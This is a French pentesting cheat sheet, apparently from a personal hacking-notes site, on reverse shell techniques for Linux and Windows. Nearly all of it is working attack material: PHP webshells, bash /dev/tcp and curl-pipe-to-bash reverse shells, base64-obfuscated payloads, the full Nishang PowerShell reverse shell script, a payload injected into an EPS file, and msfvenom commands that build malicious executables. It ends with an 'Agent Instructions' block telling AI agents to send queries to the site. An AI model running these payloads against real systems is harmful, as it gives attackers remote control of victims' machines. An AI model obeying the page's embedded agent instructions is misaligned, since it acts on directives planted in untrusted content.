# Reverse Shell - Techniques

{% hint style="info" %}
**Shell Inverse (Reverse Shell)** : Un shell inverse est une technique utilisée en cybersécurité et en piratage, où une machine attaquante établit une connexion avec une machine victime Un shell inverse est une technique courante en cybersécurité et dans le piratage, où un attaquant parvient à établir une connexion sortante depuis une machine compromise vers sa propre machine. Cette méthode permet à l'attaquant de contrôler à distance le système victime, en accédant à sa ligne de commande ou à son système d’exploitation, et d’y exécuter des commandes.
{% endhint %}

<figure><img src="/files/5fPHHlUkjrkyJROxUziQ" alt=""><figcaption></figcaption></figure>

## **Linux**:

### WebShell Linux

> Un webshell est un script permettant à un attaquant d'exécuter des commandes sur un serveur compromis via une interface web. Voici un exemple simple de fichier `cmd.php` servant à injecter des commandes via des paramètres HTTP :

```php
<?php
echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
?>
```

Ou une version plus simple avec `system()` :

```php
<?php
system($_GET['cmd']);
?>
```

### **Injection de commande via WebShell**

Exemple d’injection pour exécuter la commande `whoami` :

`cmd.php?cmd=whoami`

<figure><img src="/files/zPokRPGoaA30DVDFK1v5" alt=""><figcaption></figcaption></figure>

### **Payloads pour Reverse Shell**

> L’un des moyens pour obtenir un reverse shell consiste à injecter un payload dans le paramètre `cmd`. Pour cela, l’attaque peut utiliser une commande Bash encodée en URL .

**URL Encoded**:

```bash
bash -c "bash -i >%26 /dev/tcp/10.10.10.10/4444 0>%261"
```

**URL Decoded**:

```bash
bash -c "bash -i >&/dev/tcp/10.10.10.10/4444 0>&1"
```

<div data-full-width="true"><figure><img src="/files/so5198CwO7Hd1UfHNF3j" alt=""><figcaption></figcaption></figure></div>

**Injection directe d’un Reverse Shell dans `cmd.php`** :

```php
<?php
system($_GET['bash -c "bash -i >%26 /dev/tcp/10.10.14.46/4444 0>%261"']);
?>
```

Ou la version simplifiée :

```php
<?php 
system("bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"); 
?>
```

### **Technique en cas d’erreur :**&#x20;

#### **Serveur Web**

Si la commande échoue, on peut contourner l'erreur en créant un fichier `index.html` avec un reverse shell encodé, puis démarrer un serveur HTTP pour servir ce fichier :

```bash
#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.3/443 0>&1
```

Ensuite, on démarre un serveur HTTP avec Python :

```bash
python3 -m http.server 80
```

L’attaquant peut récupérer et exécuter le payload via `curl` :

```
curl http://10.10.10.10/ | bash
```

<figure><img src="/files/bKqUeWrVxQ1LdloJjKdk" alt=""><figcaption></figcaption></figure>

#### **Base64 Encoding pour contourner des restrictions**

Si le reverse shell échoue, une solution consiste à encoder le payload en base64. Par exemple :

```bash
#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.12/443 0>&1
```

On encode le fichier en base64 :

```bash
base64 -w 0 index.html
```

<figure><img src="/files/rwZZW6SNzKpSrnvEKdZI" alt="" width="563"><figcaption></figcaption></figure>

Puis, on utilise `echo` pour décoder et exécuter le reverse shell :

{% code overflow="wrap" fullWidth="false" %}

```bash
echo IyEvYmluL2Jhc2ggCmJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvNDQzIDA+JjEK | base64 -d | bash
```

{% endcode %}

## Windows:

### WebShell Windows:

```bash
cp /usr/share/davtest/backdoors/aspx_cmd.aspx .
```

Accédez à la WebShell via le navigateur :

<figure><img src="/files/aUcsdAkvJNB8q8kdOhtx" alt=""><figcaption></figcaption></figure>

### PS.ps1

> Le script PowerShell `PS.ps1` est souvent utilisé pour établir une connexion inversée (reverse shell) vers une machine attaquante. Pour ce faire, le script exécute une commande qui initie une connexion sortante depuis le système compromis vers l'IP de l'attaquant et sur un port spécifique.

{% embed url="<https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Shells/Invoke-PowerShellTcp.ps1>" %}

À la fin du script, nous ajoutons la ligne suivante :

```bash
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 4444
```

<figure><img src="/files/4CyekKwkIPljXnLyRM8S" alt="" width="563"><figcaption></figcaption></figure>

Une fois le script PowerShell prêt, l'attaquant peut l'envoyer au serveur compromis via une requête HTTP. Par exemple :

```powershell
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10/PS.ps1')"
```

<figure><img src="/files/IBDVF1U5cndIndpTC1YV" alt=""><figcaption></figcaption></figure>

#### **Contournement Base64**&#x20;

Convertir le contenu du script PowerShell en Base64 pour l'utiliser avec l'option `-enc` de PowerShell.&#x20;

```bash
iconv -f UTF-8 -t UTF-16LE Invoke-PowerShellTcp.ps1 | base64 -w 0 > encoded_script.txt
```

Tu obtiendras une chaîne Base64 semblable à :

```
SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA=
```

Exécution avec l'option `-enc` de PowerShell :

```bash
powershell -enc f u n c t i o n   I n v o k e - P o w e r S h e l l T c p   
 {   
 < # 
 . S Y N O P S I S 
 N i s h a n g   s c r i p t   w h i c h   c a n   b e   u s e d   f o r   R e v e r s e   o r   B i n d   i n t e r a c t i v e   P o w e r S h e l l   f r o m   a   t a r g e t .   
 
 . D E S C R I P T I O N 
 T h i s   s c r i p t   i s   a b l e   t o   c o n n e c t   t o   a   s t a n d a r d   n e t c a t   l i s t e n i n g   o n   a   p o r t   w h e n   u s i n g   t h e   - R e v e r s e   s w i t c h .   
 A l s o ,   a   s t a n d a r d   n e t c a t   c a n   c o n n e c t   t o   t h i s   s c r i p t   B i n d   t o   a   s p e c i f i c   p o r t . 
 
 T h e   s c r i p t   i s   d e r i v e d   f r o m   P o w e r f u n   w r i t t e n   b y   B e n   T u r n e r   &   D a v e   H a r d y 
 
 . P A R A M E T E R   I P A d d r e s s 
 T h e   I P   a d d r e s s   t o   c o n n e c t   t o   w h e n   u s i n g   t h e   - R e v e r s e   s w i t c h . 
 
 . P A R A M E T E R   P o r t 
 T h e   p o r t   t o   c o n n e c t   t o   w h e n   u s i n g   t h e   - R e v e r s e   s w i t c h .   W h e n   u s i n g   - B i n d   i t   i s   t h e   p o r t   o n   w h i c h   t h i s   s c r i p t   l i s t e n s . 
 
 . E X A M P L E 
 P S   >   I n v o k e - P o w e r S h e l l T c p   - R e v e r s e   - I P A d d r e s s   1 9 2 . 1 6 8 . 2 5 4 . 2 2 6   - P o r t   4 4 4 4 
 
 A b o v e   s h o w s   a n   e x a m p l e   o f   a n   i n t e r a c t i v e   P o w e r S h e l l   r e v e r s e   c o n n e c t   s h e l l .   A   n e t c a t / p o w e r c a t   l i s t e n e r   m u s t   b e   l i s t e n i n g   o n   
 t h e   g i v e n   I P   a n d   p o r t .   
 
 . E X A M P L E 
 P S   >   I n v o k e - P o w e r S h e l l T c p   - B i n d   - P o r t   4 4 4 4 
 
 A b o v e   s h o w s   a n   e x a m p l e   o f   a n   i n t e r a c t i v e   P o w e r S h e l l   b i n d   c o n n e c t   s h e l l .   U s e   a   n e t c a t / p o w e r c a t   t o   c o n n e c t   t o   t h i s   p o r t .   
 
 . E X A M P L E 
 P S   >   I n v o k e - P o w e r S h e l l T c p   - R e v e r s e   - I P A d d r e s s   f e 8 0 : : 2 0 c : 2 9 f f : f e 9 d : b 9 8 3   - P o r t   4 4 4 4 
 
 A b o v e   s h o w s   a n   e x a m p l e   o f   a n   i n t e r a c t i v e   P o w e r S h e l l   r e v e r s e   c o n n e c t   s h e l l   o v e r   I P v 6 .   A   n e t c a t / p o w e r c a t   l i s t e n e r   m u s t   b e 
 l i s t e n i n g   o n   t h e   g i v e n   I P   a n d   p o r t .   
 
 . L I N K 
 h t t p : / / w w w . l a b o f a p e n e t r a t i o n t e s t e r . c o m / 2 0 1 5 / 0 5 / w e e k - o f - p o w e r s h e l l - s h e l l s - d a y - 1 . h t m l 
 h t t p s : / / g i t h u b . c o m / n e t t i t u d e / p o w e r s h e l l / b l o b / m a s t e r / p o w e r f u n . p s 1 
 h t t p s : / / g i t h u b . c o m / s a m r a t a s h o k / n i s h a n g 
 # >             
         [ C m d l e t B i n d i n g ( D e f a u l t P a r a m e t e r S e t N a m e = " r e v e r s e " ) ]   P a r a m ( 
 
                 [ P a r a m e t e r ( P o s i t i o n   =   0 ,   M a n d a t o r y   =   $ t r u e ,   P a r a m e t e r S e t N a m e = " r e v e r s e " ) ] 
                 [ P a r a m e t e r ( P o s i t i o n   =   0 ,   M a n d a t o r y   =   $ f a l s e ,   P a r a m e t e r S e t N a m e = " b i n d " ) ] 
                 [ S t r i n g ] 
                 $ I P A d d r e s s , 
 
                 [ P a r a m e t e r ( P o s i t i o n   =   1 ,   M a n d a t o r y   =   $ t r u e ,   P a r a m e t e r S e t N a m e = " r e v e r s e " ) ] 
                 [ P a r a m e t e r ( P o s i t i o n   =   1 ,   M a n d a t o r y   =   $ t r u e ,   P a r a m e t e r S e t N a m e = " b i n d " ) ] 
                 [ I n t ] 
                 $ P o r t , 
 
                 [ P a r a m e t e r ( P a r a m e t e r S e t N a m e = " r e v e r s e " ) ] 
                 [ S w i t c h ] 
                 $ R e v e r s e , 
 
                 [ P a r a m e t e r ( P a r a m e t e r S e t N a m e = " b i n d " ) ] 
                 [ S w i t c h ] 
                 $ B i n d 
 
         ) 
 
         
         t r y   
         { 
                 # C o n n e c t   b a c k   i f   t h e   r e v e r s e   s w i t c h   i s   u s e d . 
                 i f   ( $ R e v e r s e ) 
                 { 
                         $ c l i e n t   =   N e w - O b j e c t   S y s t e m . N e t . S o c k e t s . T C P C l i e n t ( $ I P A d d r e s s , $ P o r t ) 
                 } 
 
                 # B i n d   t o   t h e   p r o v i d e d   p o r t   i f   B i n d   s w i t c h   i s   u s e d . 
                 i f   ( $ B i n d ) 
                 { 
                         $ l i s t e n e r   =   [ S y s t e m . N e t . S o c k e t s . T c p L i s t e n e r ] $ P o r t 
                         $ l i s t e n e r . s t a r t ( )         
                         $ c l i e n t   =   $ l i s t e n e r . A c c e p t T c p C l i e n t ( ) 
                 }   
 
                 $ s t r e a m   =   $ c l i e n t . G e t S t r e a m ( ) 
                 [ b y t e [ ] ] $ b y t e s   =   0 . . 6 5 5 3 5 | % { 0 } 
 
                 # S e n d   b a c k   c u r r e n t   u s e r n a m e   a n d   c o m p u t e r n a m e 
                 $ s e n d b y t e s   =   ( [ t e x t . e n c o d i n g ] : : A S C I I ) . G e t B y t e s ( " W i n d o w s   P o w e r S h e l l   r u n n i n g   a s   u s e r   "   +   $ e n v : u s e r n a m e   +   "   o n   "   +   $ e n v : c o m p u t e r n a m e   +   " ` n C o p y r i g h t   ( C )   2 0 1 5   M i c r o s o f t   C o r p o r a t i o n .   A l l   r i g h t s   r e s e r v e d . ` n ` n " ) 
                 $ s t r e a m . W r i t e ( $ s e n d b y t e s , 0 , $ s e n d b y t e s . L e n g t h ) 
 
                 # S h o w   a n   i n t e r a c t i v e   P o w e r S h e l l   p r o m p t 
                 $ s e n d b y t e s   =   ( [ t e x t . e n c o d i n g ] : : A S C I I ) . G e t B y t e s ( ' P S   '   +   ( G e t - L o c a t i o n ) . P a t h   +   ' > ' ) 
                 $ s t r e a m . W r i t e ( $ s e n d b y t e s , 0 , $ s e n d b y t e s . L e n g t h ) 
 
                 w h i l e ( ( $ i   =   $ s t r e a m . R e a d ( $ b y t e s ,   0 ,   $ b y t e s . L e n g t h ) )   - n e   0 ) 
                 { 
                         $ E n c o d e d T e x t   =   N e w - O b j e c t   - T y p e N a m e   S y s t e m . T e x t . A S C I I E n c o d i n g 
                         $ d a t a   =   $ E n c o d e d T e x t . G e t S t r i n g ( $ b y t e s , 0 ,   $ i ) 
                         t r y 
                         { 
                                 # E x e c u t e   t h e   c o m m a n d   o n   t h e   t a r g e t . 
                                 $ s e n d b a c k   =   ( I n v o k e - E x p r e s s i o n   - C o m m a n d   $ d a t a   2 > & 1   |   O u t - S t r i n g   ) 
                         } 
                         c a t c h 
                         { 
                                 W r i t e - W a r n i n g   " S o m e t h i n g   w e n t   w r o n g   w i t h   e x e c u t i o n   o f   c o m m a n d   o n   t h e   t a r g e t . "   
                                 W r i t e - E r r o r   $ _ 
                         } 
                         $ s e n d b a c k 2     =   $ s e n d b a c k   +   ' P S   '   +   ( G e t - L o c a t i o n ) . P a t h   +   ' >   ' 
                         $ x   =   ( $ e r r o r [ 0 ]   |   O u t - S t r i n g ) 
                         $ e r r o r . c l e a r ( ) 
                         $ s e n d b a c k 2   =   $ s e n d b a c k 2   +   $ x 
 
                         # R e t u r n   t h e   r e s u l t s 
                         $ s e n d b y t e   =   ( [ t e x t . e n c o d i n g ] : : A S C I I ) . G e t B y t e s ( $ s e n d b a c k 2 ) 
                         $ s t r e a m . W r i t e ( $ s e n d b y t e , 0 , $ s e n d b y t e . L e n g t h ) 
                         $ s t r e a m . F l u s h ( )     
                 } 
                 $ c l i e n t . C l o s e ( ) 
                 i f   ( $ l i s t e n e r ) 
                 { 
                         $ l i s t e n e r . S t o p ( ) 
                 } 
         } 
         c a t c h 
         { 
                 W r i t e - W a r n i n g   " S o m e t h i n g   w e n t   w r o n g !   C h e c k   i f   t h e   s e r v e r   i s   r e a c h a b l e   a n d   y o u   a r e   u s i n g   t h e   c o r r e c t   p o r t . "   
                 W r i t e - E r r o r   $ _ 
         } 
 } 
 
 I n v o k e - P o w e r S h e l l T c p   - R e v e r s e   - I P A d d r e s s   1 0 . 1 0 . 1 4 . 1 3   - P o r t   4 4 3 
 
```

<figure><img src="/files/zMHjwVAoEKBEio3RgAhX" alt=""><figcaption></figcaption></figure>

### Méthode 2: Explotation automatique&#x20;

### **Utilisation de `nc.exe`**

Le binaire `nc.exe` peut être utilisé pour établir un reverse shell. On le récupère depuis `/usr/share/SecLists/Web-Shells/FuzzDB/nc.exe` et l’on l’ajoute au répertoire de travail :

```bash
locate nc.exe 
cp /usr/share/SecLists/Web-Shells/FuzzDB/nc.exe .
```

**Écoute sur le port 443 :** Nous avons mis en place un listener avec `nc` pour écouter sur le port 443 :

```bash
rlwrap nc -nvlp 443
```

**Exécution du reverse shell via SMB :** Nous avons ensuite lancé un reverse shell en pointant le paramètre `cmd` vers notre fichier

```bash
?lang=\\10.10.14.3\share\cmd.php&cmd=\\10.10.14.3\share\nc.exe -e cmd 10.10.14.3 443
```

Nous avons ainsi obtenu un reverse shell vers notre machine.

<figure><img src="https://hacking-notes.jord4n.pro/~gitbook/image?url=https%3A%2F%2F3892280740-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FOeqybfPyWliD6m1hbKa3%252Fuploads%252FZcGSgp6ygG4vxxhcJ1Dn%252F%257B54444252-CE2B-492D-8A2D-7B143D3AB383%257D.png%3Falt%3Dmedia%26token%3D9e5eafcb-a42e-4849-8bbc-a26edaa6372e&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=3afdc7e7&#x26;sv=1" alt=""><figcaption></figcaption></figure>

### Exemple PowerShell:

> L'injection d'un payload PowerShell dans un fichier `.eps` (un fichier d'extension EPS - Encapsulated PostScript) est une technique utilisée pour exploiter des vulnérabilités dans les applications capables de traiter des fichiers EPS. En utilisant **Python** pour l'injection, un attaquant peut insérer un reverse shell dans le fichier `.eps` et l'utiliser pour obtenir une connexion inversée vers son propre serveur.

**Création du Payload PowerShell :**

L'objectif ici est d'utiliser **PowerShell** pour créer un reverse shell via une commande encodée en base64. Pour ce faire, on va injecter le **payload PowerShell** dans un fichier EPS.

#### **Utilisation de** [**RevShells** ](https://www.revshells.com/)**pour créer le payload PowerShell :**

<figure><img src="https://hacking-notes.jord4n.pro/~gitbook/image?url=https%3A%2F%2F3892280740-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FOeqybfPyWliD6m1hbKa3%252Fuploads%252FoC0AONaJHK6HvsyEXiKP%252Fimage.png%3Falt%3Dmedia%26token%3Df8e083c9-d030-451d-b982-8ebb872502fe&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=4e99692&#x26;sv=1" alt="" width="563"><figcaption></figcaption></figure>

Voici un exemple de commande pour injecter un reverse shell PowerShell :

```bash
python3 exploit.py --inject --payload "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" --filename file.eps
```

<figure><img src="https://hacking-notes.jord4n.pro/~gitbook/image?url=https%3A%2F%2F3892280740-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FOeqybfPyWliD6m1hbKa3%252Fuploads%252FBG1JMJYFeL91tODhtMbY%252Fimage.png%3Falt%3Dmedia%26token%3Defd45a53-1cbc-44d3-ab52-20e0459872ea&#x26;width=768&#x26;dpr=4&#x26;quality=100&#x26;sign=94f1e0c6&#x26;sv=1" alt=""><figcaption></figcaption></figure>

## Msfvenom Payloads:

### **Payload Windows via Metasploit**

Utilisation de Metasploit pour obtenir un reverse shell via le module `multi/handler` :

```bash
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.12
set LPORT 4444
exploit -j
```

Création du payload `shell.exe` avec la commande suivante :

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=4444 -f exe -o shell.exe
```

### **Fichier WAR** :&#x20;

Créer un fichier WAR avec Metasploit pour un reverse shell via Java :

{% code overflow="wrap" %}

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=443 -f war -o reverse.war
```

{% endcode %}

### **Fichier JSP:**

Générer un fichier JSP pour un reverse shell avec la commande suivante :

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell.jsp
```

### Fichier .msi

Création d’un fichier MSI pour un reverse shell sur Windows :

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 --platform windows -a x64 -f msi -o reverse.msi
```

<br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacking-notes.jord4n.pro/others/reverse-shell-techniques.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
